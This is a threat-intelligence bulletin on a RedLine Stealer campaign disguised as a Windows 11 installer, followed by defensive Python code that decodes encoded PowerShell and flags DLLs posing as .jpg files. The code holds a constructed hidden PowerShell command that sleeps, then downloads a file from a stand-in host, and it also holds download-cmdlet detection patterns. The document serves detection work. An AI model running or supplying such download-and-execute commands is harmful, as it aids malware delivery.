2022-02-15

RedLine Stealer Spreading from Illegitimate Windows 11 Upgrade

Level: Tactical | Source: HP - ThreatResearch | Industry: Information & Technology


HP Threat Research has identified a campaign distributing the information-stealing malware RedLine Stealer, posing as an installer for Microsoft's latest OS version, Windows 11. The campaign is recent: one of the malicious domains, windows-upgraded[.]com, was registered on January 27th, 2022. The fraudulent Microsoft-lookalike page offers a download link that delivers a malicious zip file, "Windows11InstallationAssistant.zip". The zip file is hosted on Discord and contains "six Windows DLLs, an XML file and a portable executable." When the executable is run, it launches an encoded PowerShell command that waits for a 21-second timeout and then downloads a .jpg file. The .jpg file is actually a disguised DLL. Once the DLL is loaded, the RedLine Stealer payload is active and can proceed with data collection and exfiltration at the attacker's direction.
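As an added illustration (not code from HP Threat Research or Anvilogic), two defender-side checks for the behaviour described above: decoding a PowerShell -EncodedCommand to look for a sleep followed by a download of an "image", and checking whether a file named .jpg actually begins with a PE (DLL/EXE) header rather than JPEG magic bytes. The sample command line, script and URL are constructed for the example.

```python
import base64
import re
from typing import Optional

# File magic: JPEG starts with FF D8 FF; Windows PE images (EXE/DLL) start with "MZ".
JPEG_MAGIC = b"\xff\xd8\xff"
PE_MAGIC = b"MZ"

def classify_payload(data: bytes) -> str:
    """Classify by content, never by extension: returns 'pe', 'jpeg' or 'unknown'."""
    if data.startswith(PE_MAGIC):
        return "pe"
    if data.startswith(JPEG_MAGIC):
        return "jpeg"
    return "unknown"

def is_disguised_pe(filename: str, data: bytes) -> bool:
    """True when the name claims an image but the bytes are a Windows executable."""
    claims_image = filename.lower().endswith((".jpg", ".jpeg", ".png", ".gif"))
    return claims_image and classify_payload(data) == "pe"

def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Decode the base64 UTF-16LE payload of -e / -enc / -EncodedCommand, if present."""
    m = re.search(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", cmdline, re.IGNORECASE)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def suspicious_powershell(cmdline: str) -> bool:
    """Flag encoded PowerShell that sleeps, then downloads a URL ending in an image extension."""
    decoded = decode_encoded_command(cmdline)
    if decoded is None:
        return False
    text = decoded.lower()
    downloads = any(k in text for k in ("downloadfile", "downloadstring", "invoke-webrequest"))
    sleeps = "start-sleep" in text or "timeout" in text
    image_url = re.search(r"https?://\S+\.(jpg|jpeg|png)", text) is not None
    return downloads and sleeps and image_url

# Constructed sample (not from the campaign): wait 21 seconds, then fetch a ".jpg".
SAMPLE_SCRIPT = ("Start-Sleep -Seconds 21; "
                 "(New-Object Net.WebClient).DownloadFile('http://example.invalid/x.jpg', 'x.jpg')")
SAMPLE_CMDLINE = ("powershell.exe -NoP -W Hidden -enc "
                  + base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode())
```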
